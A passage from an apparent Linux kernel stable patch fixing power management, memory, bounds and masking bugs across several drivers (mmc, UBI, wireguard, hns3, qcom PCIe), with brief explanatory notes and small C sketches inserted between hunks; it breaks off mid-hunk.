++	/* For non-wakeup, turn off if not already turned off by runtime suspend */
++	} else if (!pm_runtime_suspended(dev))
+ 		lis3lv02d_poweroff(lis3);
++
+ 	return 0;
+ }
+ 
+@@ -209,13 +215,12 @@ static int lis3lv02d_i2c_resume(struct device *dev)
+ 	struct i2c_client *client = to_i2c_client(dev);
+ 	struct lis3lv02d *lis3 = i2c_get_clientdata(client);
+ 
+-	/*
+-	 * pm_runtime documentation says that devices should always
+-	 * be powered on at resume. Pm_runtime turns them off after system
+-	 * wide resume is complete.
+-	 */
+-	if (!lis3->pdata || !lis3->pdata->wakeup_flags ||
+-		pm_runtime_suspended(dev))
++	/* Turn back off if turned on for wakeup and runtime suspended */
++	if (lis3->pdata && lis3->pdata->wakeup_flags) {
++		if (pm_runtime_suspended(dev))
++			lis3lv02d_poweroff(lis3);
++	/* For non-wakeup, turn back on if not runtime suspended */
++	} else if (!pm_runtime_suspended(dev))
+ 		lis3lv02d_poweron(lis3);
+ 
+ 	return 0;
+diff --git a/drivers/misc/mei/hw-me-regs.h b/drivers/misc/mei/hw-me-regs.h
+index bdc65d50b945f..3390ff5111033 100644
+--- a/drivers/misc/mei/hw-me-regs.h
++++ b/drivers/misc/mei/hw-me-regs.h
+@@ -112,6 +112,8 @@
+ #define MEI_DEV_ID_RPL_S      0x7A68  /* Raptor Lake Point S */
+ 
+ #define MEI_DEV_ID_MTL_M      0x7E70  /* Meteor Lake Point M */
++#define MEI_DEV_ID_ARL_S      0x7F68  /* Arrow Lake Point S */
++#define MEI_DEV_ID_ARL_H      0x7770  /* Arrow Lake Point H */
+ 
+ /*
+  * MEI HW Section
+diff --git a/drivers/misc/mei/pci-me.c b/drivers/misc/mei/pci-me.c
+index 5bf0d50d55a00..f8219cbd2c7ce 100644
+--- a/drivers/misc/mei/pci-me.c
++++ b/drivers/misc/mei/pci-me.c
+@@ -119,6 +119,8 @@ static const struct pci_device_id mei_me_pci_tbl[] = {
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_RPL_S, MEI_ME_PCH15_CFG)},
+ 
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_MTL_M, MEI_ME_PCH15_CFG)},
++	{MEI_PCI_DEVICE(MEI_DEV_ID_ARL_S, MEI_ME_PCH15_CFG)},
++	{MEI_PCI_DEVICE(MEI_DEV_ID_ARL_H, MEI_ME_PCH15_CFG)},
+ 
+ 	/* required last entry */
+ 	{0, }
+diff --git a/drivers/mmc/core/block.c b/drivers/mmc/core/block.c
+index ea60efaecb0dd..657772546b6b1 100644
+--- a/drivers/mmc/core/block.c
++++ b/drivers/mmc/core/block.c
+@@ -415,7 +415,7 @@ static struct mmc_blk_ioc_data *mmc_blk_ioctl_copy_from_user(
+ 	struct mmc_blk_ioc_data *idata;
+ 	int err;
+ 
+-	idata = kmalloc(sizeof(*idata), GFP_KERNEL);
++	idata = kzalloc(sizeof(*idata), GFP_KERNEL);
+ 	if (!idata) {
+ 		err = -ENOMEM;
+ 		goto out;
+@@ -490,7 +490,7 @@ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+ 	if (idata->flags & MMC_BLK_IOC_DROP)
+ 		return 0;
+ 
+-	if (idata->flags & MMC_BLK_IOC_SBC)
++	if (idata->flags & MMC_BLK_IOC_SBC && i > 0)
+ 		prev_idata = idatas[i - 1];
+ 
+ 	/*
+@@ -889,10 +889,11 @@ static const struct block_device_operations mmc_bdops = {
+ static int mmc_blk_part_switch_pre(struct mmc_card *card,
+ 				   unsigned int part_type)
+ {
+-	const unsigned int mask = EXT_CSD_PART_CONFIG_ACC_RPMB;
++	const unsigned int mask = EXT_CSD_PART_CONFIG_ACC_MASK;
++	const unsigned int rpmb = EXT_CSD_PART_CONFIG_ACC_RPMB;
+ 	int ret = 0;
+ 
+-	if ((part_type & mask) == mask) {
++	if ((part_type & mask) == rpmb) {
+ 		if (card->ext_csd.cmdq_en) {
+ 			ret = mmc_cmdq_disable(card);
+ 			if (ret)
+@@ -907,10 +908,11 @@ static int mmc_blk_part_switch_pre(struct mmc_card *card,
+ static int mmc_blk_part_switch_post(struct mmc_card *card,
+ 				    unsigned int part_type)
+ {
+-	const unsigned int mask = EXT_CSD_PART_CONFIG_ACC_RPMB;
++	const unsigned int mask = EXT_CSD_PART_CONFIG_ACC_MASK;
++	const unsigned int rpmb = EXT_CSD_PART_CONFIG_ACC_RPMB;
+ 	int ret = 0;
+ 
+-	if ((part_type & mask) == mask) {
++	if ((part_type & mask) == rpmb) {
+ 		mmc_retune_unpause(card->host);
+ 		if (card->reenable_cmdq && !card->ext_csd.cmdq_en)
+ 			ret = mmc_cmdq_enable(card);
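
The mmc_blk_part_switch hunks fix a masked-compare bug: `(part_type & mask) == mask` is only true when every bit of the access field is set, while the intent is to test the field against the RPMB value. With the EXT_CSD_PART_CONFIG_ACC_* values as I recall them (mask 0x7, RPMB 0x3), the old test matched the value 0x7, never RPMB. Reduced to a sketch:

#include <stdbool.h>
#include <stdio.h>

/* Values as in the kernel's EXT_CSD_PART_CONFIG_ACC_* (from memory). */
#define ACC_MASK 0x7
#define ACC_RPMB 0x3

/* Correct: extract the field, then compare with the wanted value. */
static bool is_rpmb(unsigned int part_type)
{
	return (part_type & ACC_MASK) == ACC_RPMB;
}

/* Buggy variant from before the fix: only true when the field is 0x7. */
static bool is_rpmb_buggy(unsigned int part_type)
{
	return (part_type & ACC_MASK) == ACC_MASK;
}

int main(void)
{
	printf("%d %d\n", is_rpmb(0x3), is_rpmb_buggy(0x3));    /* 1 0 */
	return 0;
}
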
+diff --git a/drivers/mmc/host/sdhci-omap.c b/drivers/mmc/host/sdhci-omap.c
+index 033be559a7309..bfb7c8b96341c 100644
+--- a/drivers/mmc/host/sdhci-omap.c
++++ b/drivers/mmc/host/sdhci-omap.c
+@@ -1442,6 +1442,9 @@ static int __maybe_unused sdhci_omap_runtime_suspend(struct device *dev)
+ 	struct sdhci_pltfm_host *pltfm_host = sdhci_priv(host);
+ 	struct sdhci_omap_host *omap_host = sdhci_pltfm_priv(pltfm_host);
+ 
++	if (host->tuning_mode != SDHCI_TUNING_MODE_3)
++		mmc_retune_needed(host->mmc);
++
+ 	if (omap_host->con != -EINVAL)
+ 		sdhci_runtime_suspend_host(host);
+ 
+diff --git a/drivers/mmc/host/tmio_mmc_core.c b/drivers/mmc/host/tmio_mmc_core.c
+index 437048bb80273..5024cae411d3a 100644
+--- a/drivers/mmc/host/tmio_mmc_core.c
++++ b/drivers/mmc/host/tmio_mmc_core.c
+@@ -259,6 +259,8 @@ static void tmio_mmc_reset_work(struct work_struct *work)
+ 	else
+ 		mrq->cmd->error = -ETIMEDOUT;
+ 
++	/* No new calls yet, but disallow concurrent tmio_mmc_done_work() */
++	host->mrq = ERR_PTR(-EBUSY);
+ 	host->cmd = NULL;
+ 	host->data = NULL;
+ 
+diff --git a/drivers/mtd/nand/raw/meson_nand.c b/drivers/mtd/nand/raw/meson_nand.c
+index 0aeac8ccbd0ee..05925fb694602 100644
+--- a/drivers/mtd/nand/raw/meson_nand.c
++++ b/drivers/mtd/nand/raw/meson_nand.c
+@@ -63,7 +63,7 @@
+ #define CMDRWGEN(cmd_dir, ran, bch, short_mode, page_size, pages)	\
+ 	(								\
+ 		(cmd_dir)			|			\
+-		((ran) << 19)			|			\
++		(ran)				|			\
+ 		((bch) << 14)			|			\
+ 		((short_mode) << 13)		|			\
+ 		(((page_size) & 0x7f) << 6)	|			\
+diff --git a/drivers/mtd/ubi/fastmap.c b/drivers/mtd/ubi/fastmap.c
+index ca2d9efe62c3c..1060e19205d2a 100644
+--- a/drivers/mtd/ubi/fastmap.c
++++ b/drivers/mtd/ubi/fastmap.c
+@@ -85,9 +85,10 @@ size_t ubi_calc_fm_size(struct ubi_device *ubi)
+ 		sizeof(struct ubi_fm_scan_pool) +
+ 		sizeof(struct ubi_fm_scan_pool) +
+ 		(ubi->peb_count * sizeof(struct ubi_fm_ec)) +
+-		(sizeof(struct ubi_fm_eba) +
+-		(ubi->peb_count * sizeof(__be32))) +
+-		sizeof(struct ubi_fm_volhdr) * UBI_MAX_VOLUMES;
++		((sizeof(struct ubi_fm_eba) +
++		  sizeof(struct ubi_fm_volhdr)) *
++		 (UBI_MAX_VOLUMES + UBI_INT_VOL_COUNT)) +
++		(ubi->peb_count * sizeof(__be32));
+ 	return roundup(size, ubi->leb_size);
+ }
+ 
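
The ubi_calc_fm_size() fix changes the worst-case accounting: the old formula reserved a single struct ubi_fm_eba plus volume headers for UBI_MAX_VOLUMES only, while the corrected one budgets one ubi_fm_eba and one ubi_fm_volhdr for every possible volume, internal volumes included, on top of one __be32 LEB mapping slot per PEB. The shape of the computation, with invented sizes standing in for the real struct sizes:

#include <stdint.h>
#include <stdio.h>

#define UBI_MAX_VOLUMES   128
#define UBI_INT_VOL_COUNT 1     /* assumption for illustration */

static size_t fm_size_upper_bound(size_t fixed_hdrs, size_t peb_count,
				  size_t fm_ec, size_t fm_eba,
				  size_t fm_volhdr, size_t leb_size)
{
	size_t size = fixed_hdrs
		+ peb_count * fm_ec
		/* one EBA record and one volume header per possible
		 * volume, internal volumes included */
		+ (fm_eba + fm_volhdr) * (UBI_MAX_VOLUMES + UBI_INT_VOL_COUNT)
		/* one __be32 mapping slot per PEB */
		+ peb_count * sizeof(uint32_t);

	/* roundup(size, leb_size) */
	return (size + leb_size - 1) / leb_size * leb_size;
}

int main(void)
{
	printf("%zu\n", fm_size_upper_bound(64, 1024, 12, 8, 40, 126976));
	return 0;
}
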
+diff --git a/drivers/mtd/ubi/vtbl.c b/drivers/mtd/ubi/vtbl.c
+index f700f0e4f2ec4..6e5489e233dd2 100644
+--- a/drivers/mtd/ubi/vtbl.c
++++ b/drivers/mtd/ubi/vtbl.c
+@@ -791,6 +791,12 @@ int ubi_read_volume_table(struct ubi_device *ubi, struct ubi_attach_info *ai)
+ 	 * The number of supported volumes is limited by the eraseblock size
+ 	 * and by the UBI_MAX_VOLUMES constant.
+ 	 */
++
++	if (ubi->leb_size < UBI_VTBL_RECORD_SIZE) {
++		ubi_err(ubi, "LEB size too small for a volume record");
++		return -EINVAL;
++	}
++
+ 	ubi->vtbl_slots = ubi->leb_size / UBI_VTBL_RECORD_SIZE;
+ 	if (ubi->vtbl_slots > UBI_MAX_VOLUMES)
+ 		ubi->vtbl_slots = UBI_MAX_VOLUMES;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_trace.h b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_trace.h
+index 8510b88d49820..f3cd5a376eca9 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_trace.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_trace.h
+@@ -24,7 +24,7 @@ TRACE_EVENT(hclge_pf_mbx_get,
+ 		__field(u8, code)
+ 		__field(u8, subcode)
+ 		__string(pciname, pci_name(hdev->pdev))
+-		__string(devname, &hdev->vport[0].nic.kinfo.netdev->name)
++		__string(devname, hdev->vport[0].nic.kinfo.netdev->name)
+ 		__array(u32, mbx_data, PF_GET_MBX_LEN)
+ 	),
+ 
+@@ -33,7 +33,7 @@ TRACE_EVENT(hclge_pf_mbx_get,
+ 		__entry->code = req->msg.code;
+ 		__entry->subcode = req->msg.subcode;
+ 		__assign_str(pciname, pci_name(hdev->pdev));
+-		__assign_str(devname, &hdev->vport[0].nic.kinfo.netdev->name);
++		__assign_str(devname, hdev->vport[0].nic.kinfo.netdev->name);
+ 		memcpy(__entry->mbx_data, req,
+ 		       sizeof(struct hclge_mbx_vf_to_pf_cmd));
+ 	),
+@@ -56,7 +56,7 @@ TRACE_EVENT(hclge_pf_mbx_send,
+ 		__field(u8, vfid)
+ 		__field(u16, code)
+ 		__string(pciname, pci_name(hdev->pdev))
+-		__string(devname, &hdev->vport[0].nic.kinfo.netdev->name)
++		__string(devname, hdev->vport[0].nic.kinfo.netdev->name)
+ 		__array(u32, mbx_data, PF_SEND_MBX_LEN)
+ 	),
+ 
+@@ -64,7 +64,7 @@ TRACE_EVENT(hclge_pf_mbx_send,
+ 		__entry->vfid = req->dest_vfid;
+ 		__entry->code = le16_to_cpu(req->msg.code);
+ 		__assign_str(pciname, pci_name(hdev->pdev));
+-		__assign_str(devname, &hdev->vport[0].nic.kinfo.netdev->name);
++		__assign_str(devname, hdev->vport[0].nic.kinfo.netdev->name);
+ 		memcpy(__entry->mbx_data, req,
+ 		       sizeof(struct hclge_mbx_pf_to_vf_cmd));
+ 	),
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_trace.h b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_trace.h
+index 5d4895bb57a17..b259e95dd53c2 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_trace.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_trace.h
+@@ -23,7 +23,7 @@ TRACE_EVENT(hclge_vf_mbx_get,
+ 		__field(u8, vfid)
+ 		__field(u16, code)
+ 		__string(pciname, pci_name(hdev->pdev))
+-		__string(devname, &hdev->nic.kinfo.netdev->name)
++		__string(devname, hdev->nic.kinfo.netdev->name)
+ 		__array(u32, mbx_data, VF_GET_MBX_LEN)
+ 	),
+ 
+@@ -31,7 +31,7 @@ TRACE_EVENT(hclge_vf_mbx_get,
+ 		__entry->vfid = req->dest_vfid;
+ 		__entry->code = le16_to_cpu(req->msg.code);
+ 		__assign_str(pciname, pci_name(hdev->pdev));
+-		__assign_str(devname, &hdev->nic.kinfo.netdev->name);
++		__assign_str(devname, hdev->nic.kinfo.netdev->name);
+ 		memcpy(__entry->mbx_data, req,
+ 		       sizeof(struct hclge_mbx_pf_to_vf_cmd));
+ 	),
+@@ -55,7 +55,7 @@ TRACE_EVENT(hclge_vf_mbx_send,
+ 		__field(u8, code)
+ 		__field(u8, subcode)
+ 		__string(pciname, pci_name(hdev->pdev))
+-		__string(devname, &hdev->nic.kinfo.netdev->name)
++		__string(devname, hdev->nic.kinfo.netdev->name)
+ 		__array(u32, mbx_data, VF_SEND_MBX_LEN)
+ 	),
+ 
+@@ -64,7 +64,7 @@ TRACE_EVENT(hclge_vf_mbx_send,
+ 		__entry->code = req->msg.code;
+ 		__entry->subcode = req->msg.subcode;
+ 		__assign_str(pciname, pci_name(hdev->pdev));
+-		__assign_str(devname, &hdev->nic.kinfo.netdev->name);
++		__assign_str(devname, hdev->nic.kinfo.netdev->name);
+ 		memcpy(__entry->mbx_data, req,
+ 		       sizeof(struct hclge_mbx_vf_to_pf_cmd));
+ 	),
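
The hns3 trace fixes drop a stray `&`: kinfo.netdev->name is a char array, so plain `name` decays to a char * while `&name` is a pointer-to-array, the same address but the wrong type for the __string()/__assign_str() helpers. The distinction, standalone:

#include <stdio.h>

struct netdev {
	char name[16];
};

int main(void)
{
	struct netdev nd = { .name = "eth0" };

	char *p = nd.name;              /* array decays to char * */
	char (*q)[16] = &nd.name;       /* pointer to the whole array */

	/* Same address, different type; passing `q` where a string
	 * pointer is expected is what the hunks above correct. */
	printf("%p %p %s\n", (void *)p, (void *)q, p);
	return 0;
}
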
+diff --git a/drivers/net/ethernet/xilinx/ll_temac_main.c b/drivers/net/ethernet/xilinx/ll_temac_main.c
+index 6bf5e341c3c11..08c45756b2181 100644
+--- a/drivers/net/ethernet/xilinx/ll_temac_main.c
++++ b/drivers/net/ethernet/xilinx/ll_temac_main.c
+@@ -1445,7 +1445,7 @@ static int temac_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	/* map device registers */
+-	lp->regs = devm_platform_ioremap_resource_byname(pdev, 0);
++	lp->regs = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(lp->regs)) {
+ 		dev_err(&pdev->dev, "could not map TEMAC registers\n");
+ 		return -ENOMEM;
+diff --git a/drivers/net/wireguard/netlink.c b/drivers/net/wireguard/netlink.c
+index 6d1bd9f52d02a..81b716e6612e2 100644
+--- a/drivers/net/wireguard/netlink.c
++++ b/drivers/net/wireguard/netlink.c
+@@ -164,8 +164,8 @@ get_peer(struct wg_peer *peer, struct sk_buff *skb, struct dump_ctx *ctx)
+ 	if (!allowedips_node)
+ 		goto no_allowedips;
+ 	if (!ctx->allowedips_seq)
+-		ctx->allowedips_seq = peer->device->peer_allowedips.seq;
+-	else if (ctx->allowedips_seq != peer->device->peer_allowedips.seq)
++		ctx->allowedips_seq = ctx->wg->peer_allowedips.seq;
++	else if (ctx->allowedips_seq != ctx->wg->peer_allowedips.seq)
+ 		goto no_allowedips;
+ 
+ 	allowedips_nest = nla_nest_start(skb, WGPEER_A_ALLOWEDIPS);
+@@ -255,17 +255,17 @@ static int wg_get_device_dump(struct sk_buff *skb, struct netlink_callback *cb)
+ 	if (!peers_nest)
+ 		goto out;
+ 	ret = 0;
+-	/* If the last cursor was removed via list_del_init in peer_remove, then
++	lockdep_assert_held(&wg->device_update_lock);
++	/* If the last cursor was removed in peer_remove or peer_remove_all, then
+ 	 * we just treat this the same as there being no more peers left. The
+ 	 * reason is that seq_nr should indicate to userspace that this isn't a
+ 	 * coherent dump anyway, so they'll try again.
+ 	 */
+ 	if (list_empty(&wg->peer_list) ||
+-	    (ctx->next_peer && list_empty(&ctx->next_peer->peer_list))) {
++	    (ctx->next_peer && ctx->next_peer->is_dead)) {
+ 		nla_nest_cancel(skb, peers_nest);
+ 		goto out;
+ 	}
+-	lockdep_assert_held(&wg->device_update_lock);
+ 	peer = list_prepare_entry(ctx->next_peer, &wg->peer_list, peer_list);
+ 	list_for_each_entry_continue(peer, &wg->peer_list, peer_list) {
+ 		if (get_peer(peer, skb, ctx)) {
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+index ad5a8d61d9385..24a3d5a593f15 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+@@ -791,8 +791,7 @@ s32 brcmf_notify_escan_complete(struct brcmf_cfg80211_info *cfg,
+ 	scan_request = cfg->scan_request;
+ 	cfg->scan_request = NULL;
+ 
+-	if (timer_pending(&cfg->escan_timeout))
+-		del_timer_sync(&cfg->escan_timeout);
++	timer_delete_sync(&cfg->escan_timeout);
+ 
+ 	if (fw_abort) {
+ 		/* Do a scan abort to stop the driver's scan engine */
+@@ -7805,6 +7804,7 @@ void brcmf_cfg80211_detach(struct brcmf_cfg80211_info *cfg)
+ 	brcmf_btcoex_detach(cfg);
+ 	wiphy_unregister(cfg->wiphy);
+ 	wl_deinit_priv(cfg);
++	cancel_work_sync(&cfg->escan_timeout_work);
+ 	brcmf_free_wiphy(cfg->wiphy);
+ 	kfree(cfg);
+ }
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+index 3ef0b776b7727..3b0ed1cdfa11e 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+@@ -2903,8 +2903,6 @@ static void iwl_fw_dbg_collect_sync(struct iwl_fw_runtime *fwrt, u8 wk_idx)
+ 	struct iwl_fw_dbg_params params = {0};
+ 	struct iwl_fwrt_dump_data *dump_data =
+ 		&fwrt->dump.wks[wk_idx].dump_data;
+-	u32 policy;
+-	u32 time_point;
+ 	if (!test_bit(wk_idx, &fwrt->dump.active_wks))
+ 		return;
+ 
+@@ -2935,13 +2933,16 @@ static void iwl_fw_dbg_collect_sync(struct iwl_fw_runtime *fwrt, u8 wk_idx)
+ 
+ 	iwl_fw_dbg_stop_restart_recording(fwrt, &params, false);
+ 
+-	policy = le32_to_cpu(dump_data->trig->apply_policy);
+-	time_point = le32_to_cpu(dump_data->trig->time_point);
++	if (iwl_trans_dbg_ini_valid(fwrt->trans)) {
++		u32 policy = le32_to_cpu(dump_data->trig->apply_policy);
++		u32 time_point = le32_to_cpu(dump_data->trig->time_point);
+ 
+-	if (policy & IWL_FW_INI_APPLY_POLICY_DUMP_COMPLETE_CMD) {
+-		IWL_DEBUG_FW_INFO(fwrt, "WRT: sending dump complete\n");
+-		iwl_send_dbg_dump_complete_cmd(fwrt, time_point, 0);
++		if (policy & IWL_FW_INI_APPLY_POLICY_DUMP_COMPLETE_CMD) {
++			IWL_DEBUG_FW_INFO(fwrt, "WRT: sending dump complete\n");
++			iwl_send_dbg_dump_complete_cmd(fwrt, time_point, 0);
++		}
+ 	}
++
+ 	if (fwrt->trans->dbg.last_tp_resetfw == IWL_FW_INI_RESET_FW_MODE_STOP_FW_ONLY)
+ 		iwl_force_nmi(fwrt->trans);
+ 
+diff --git a/drivers/nvmem/meson-efuse.c b/drivers/nvmem/meson-efuse.c
+index d6b533497ce1a..ba2714bef8d0e 100644
+--- a/drivers/nvmem/meson-efuse.c
++++ b/drivers/nvmem/meson-efuse.c
+@@ -47,7 +47,6 @@ static int meson_efuse_probe(struct platform_device *pdev)
+ 	struct nvmem_config *econfig;
+ 	struct clk *clk;
+ 	unsigned int size;
+-	int ret;
+ 
+ 	sm_np = of_parse_phandle(pdev->dev.of_node, "secure-monitor", 0);
+ 	if (!sm_np) {
+@@ -60,27 +59,9 @@ static int meson_efuse_probe(struct platform_device *pdev)
+ 	if (!fw)
+ 		return -EPROBE_DEFER;
+ 
+-	clk = devm_clk_get(dev, NULL);
+-	if (IS_ERR(clk)) {
+-		ret = PTR_ERR(clk);
+-		if (ret != -EPROBE_DEFER)
+-			dev_err(dev, "failed to get efuse gate");
+-		return ret;
+-	}
+-
+-	ret = clk_prepare_enable(clk);
+-	if (ret) {
+-		dev_err(dev, "failed to enable gate");
+-		return ret;
+-	}
+-
+-	ret = devm_add_action_or_reset(dev,
+-				       (void(*)(void *))clk_disable_unprepare,
+-				       clk);
+-	if (ret) {
+-		dev_err(dev, "failed to add disable callback");
+-		return ret;
+-	}
++	clk = devm_clk_get_enabled(dev, NULL);
++	if (IS_ERR(clk))
++		return dev_err_probe(dev, PTR_ERR(clk), "failed to get efuse gate");
+ 
+ 	if (meson_sm_call(fw, SM_EFUSE_USER_MAX, &size, 0, 0, 0, 0, 0) < 0) {
+ 		dev_err(dev, "failed to get max user");
+diff --git a/drivers/pci/controller/dwc/pcie-designware-ep.c b/drivers/pci/controller/dwc/pcie-designware-ep.c
+index 4086a7818981a..506d6d061d4cd 100644
+--- a/drivers/pci/controller/dwc/pcie-designware-ep.c
++++ b/drivers/pci/controller/dwc/pcie-designware-ep.c
+@@ -669,8 +669,13 @@ int dw_pcie_ep_init_complete(struct dw_pcie_ep *ep)
+ 		nbars = (reg & PCI_REBAR_CTRL_NBAR_MASK) >>
+ 			PCI_REBAR_CTRL_NBAR_SHIFT;
+ 
++		/*
++		 * PCIe r6.0, sec 7.8.6.2 requires us to support at least one
++		 * size in the range from 1 MB to 512 GB. Advertise support
++		 * for 1 MB BAR size only.
++		 */
+ 		for (i = 0; i < nbars; i++, offset += PCI_REBAR_CTRL)
+-			dw_pcie_writel_dbi(pci, offset + PCI_REBAR_CAP, 0x0);
++			dw_pcie_writel_dbi(pci, offset + PCI_REBAR_CAP, BIT(4));
+ 	}
+ 
+ 	dw_pcie_setup(pci);
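
Writing BIT(4) instead of 0x0 into PCI_REBAR_CAP advertises exactly one supported BAR size rather than none. In the Resizable BAR capability, if memory serves, a set bit n (n >= 4) advertises support for a size of 2^(n-4) MB, so bit 4 is the mandatory 1 MB size. The encoding as a helper:

#include <stdint.h>
#include <stdio.h>

/* Resizable BAR capability: bit n (n >= 4) advertises support for a
 * BAR size of 2^(n - 4) MB, assuming the encoding recalled above. */
static uint64_t rebar_bit_to_bytes(unsigned int bit)
{
	return 1ULL << (bit - 4 + 20);  /* 2^(bit-4) * 1 MB */
}

int main(void)
{
	printf("bit 4 -> %llu bytes\n",
	       (unsigned long long)rebar_bit_to_bytes(4));      /* 1048576 */
	return 0;
}
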
+diff --git a/drivers/pci/controller/dwc/pcie-qcom.c b/drivers/pci/controller/dwc/pcie-qcom.c
+index 0ccd92faf078a..0bad23ec53ee8 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom.c
++++ b/drivers/pci/controller/dwc/pcie-qcom.c
+@@ -50,6 +50,7 @@
+ #define PARF_SLV_ADDR_SPACE_SIZE		0x358
+ #define PARF_DEVICE_TYPE			0x1000
+ #define PARF_BDF_TO_SID_TABLE_N			0x2000
++#define PARF_BDF_TO_SID_CFG			0x2c00
+ 
+ /* ELBI registers */
+ #define ELBI_SYS_CTRL				0x04
+@@ -102,6 +103,9 @@
+ /* PARF_DEVICE_TYPE register fields */
+ #define DEVICE_TYPE_RC				0x4
+ 
++/* PARF_BDF_TO_SID_CFG fields */
++#define BDF_TO_SID_BYPASS			BIT(0)
++
+ /* ELBI_SYS_CTRL register fields */
+ #define ELBI_SYS_CTRL_LT_ENABLE			BIT(0)
+ 
+@@ -1312,6 +1316,82 @@ static void qcom_pcie_deinit_2_7_0(struct qcom_pcie *pcie)
+ 	regulator_bulk_disable(ARRAY_SIZE(res->supplies), res->supplies);
+ }
+ 
++static int qcom_pcie_config_sid_1_9_0(struct qcom_pcie *pcie)
++{
++	/* iommu map structure */
++	struct {
++		u32 bdf;
++		u32 phandle;
++		u32 smmu_sid;
++		u32 smmu_sid_len;
++	} *map;
++	void __iomem *bdf_to_sid_base = pcie->parf + PARF_BDF_TO_SID_TABLE_N;
++	struct device *dev = pcie->pci->dev;
++	u8 qcom_pcie_crc8_table[CRC8_TABLE_SIZE];
++	int i, nr_map, size = 0;
++	u32 smmu_sid_base;
++	u32 val;
++
++	of_get_property(dev->of_node, "iommu-map", &size);
++	if (!size)
++		return 0;
++
++	/* Enable BDF to SID translation by disabling bypass mode (default) */
++	val = readl(pcie->parf + PARF_BDF_TO_SID_CFG);
++	val &= ~BDF_TO_SID_BYPASS;
++	writel(val, pcie->parf + PARF_BDF_TO_SID_CFG);
++
++	map = kzalloc(size, GFP_KERNEL);
++	if (!map)
++		return -ENOMEM;
++
++	of_property_read_u32_array(dev->of_node, "iommu-map", (u32 *)map,
++				   size / sizeof(u32));
++
++	nr_map = size / (sizeof(*map));
++
++	crc8_populate_msb(qcom_pcie_crc8_table, QCOM_PCIE_CRC8_POLYNOMIAL);
++
++	/* Registers need to be zeroed out first */
++	memset_io(bdf_to_sid_base, 0, CRC8_TABLE_SIZE * sizeof(u32));
++
++	/* Extract the SMMU SID base from the first entry of iommu-map */
++	smmu_sid_base = map[0].smmu_sid;
++
++	/* Look for an available entry to hold the mapping */
++	for (i = 0; i < nr_map; i++) {
++		__be16 bdf_be = cpu_to_be16(map[i].bdf);
++		u32 val;
++		u8 hash;
++
++		hash = crc8(qcom_pcie_crc8_table, (u8 *)&bdf_be, sizeof(bdf_be), 0);
++
++		val = readl(bdf_to_sid_base + hash * sizeof(u32));
++
++		/* If the register is already populated, look for the next available entry */
++		while (val) {
++			u8 current_hash = hash++;
++			u8 next_mask = 0xff;
++
++			/* If NEXT field is NULL then update it with next hash */
++			if (!(val & next_mask)) {
++				val |= (u32)hash;
++				writel(val, bdf_to_sid_base + current_hash * sizeof(u32));
++			}
++
++			val = readl(bdf_to_sid_base + hash * sizeof(u32));
++		}
++
++		/* BDF [31:16] | SID [15:8] | NEXT [7:0] */
++		val = map[i].bdf << 16 | (map[i].smmu_sid - smmu_sid_base) << 8 | 0;
++		writel(val, bdf_to_sid_base + hash * sizeof(u32));
++	}
++
++	kfree(map);
++
++	return 0;
++}
++
+ static int qcom_pcie_get_resources_2_9_0(struct qcom_pcie *pcie)
+ {
+ 	struct qcom_pcie_resources_2_9_0 *res = &pcie->res.v2_9_0;
+@@ -1429,77 +1509,6 @@ static int qcom_pcie_link_up(struct dw_pcie *pci)
+ 	return !!(val & PCI_EXP_LNKSTA_DLLLA);
+ }
+ 
+-static int qcom_pcie_config_sid_sm8250(struct qcom_pcie *pcie)
+-{
+-	/* iommu map structure */
+-	struct {
+-		u32 bdf;
+-		u32 phandle;
+-		u32 smmu_sid;
+-		u32 smmu_sid_len;
+-	} *map;
+-	void __iomem *bdf_to_sid_base = pcie->parf + PARF_BDF_TO_SID_TABLE_N;
+-	struct device *dev = pcie->pci->dev;
+-	u8 qcom_pcie_crc8_table[CRC8_TABLE_SIZE];
+-	int i, nr_map, size = 0;
+-	u32 smmu_sid_base;
+-
+-	of_get_property(dev->of_node, "iommu-map", &size);
+-	if (!size)
+-		return 0;
+-
+-	map = kzalloc(size, GFP_KERNEL);
+-	if (!map)
+-		return -ENOMEM;
+-
+-	of_property_read_u32_array(dev->of_node,
+-		"iommu-map", (u32 *)map, size / sizeof(u32));
+-
+-	nr_map = size / (sizeof(*map));
+-
+-	crc8_populate_msb(qcom_pcie_crc8_table, QCOM_PCIE_CRC8_POLYNOMIAL);
+-
+-	/* Registers need to be zero out first */
+-	memset_io(bdf_to_sid_base, 0, CRC8_TABLE_SIZE * sizeof(u32));
+-
+-	/* Extract the SMMU SID base from the first entry of iommu-map */
+-	smmu_sid_base = map[0].smmu_sid;
+-
+-	/* Look for an available entry to hold the mapping */
+-	for (i = 0; i < nr_map; i++) {
+-		__be16 bdf_be = cpu_to_be16(map[i].bdf);
+-		u32 val;
+-		u8 hash;
+-
+-		hash = crc8(qcom_pcie_crc8_table, (u8 *)&bdf_be, sizeof(bdf_be),
+-			0);
+-
+-		val = readl(bdf_to_sid_base + hash * sizeof(u32));
+-
+-		/* If the register is already populated, look for next available entry */
+-		while (val) {
+-			u8 current_hash = hash++;
+-			u8 next_mask = 0xff;
+-
+-			/* If NEXT field is NULL then update it with next hash */
+-			if (!(val & next_mask)) {
+-				val |= (u32)hash;
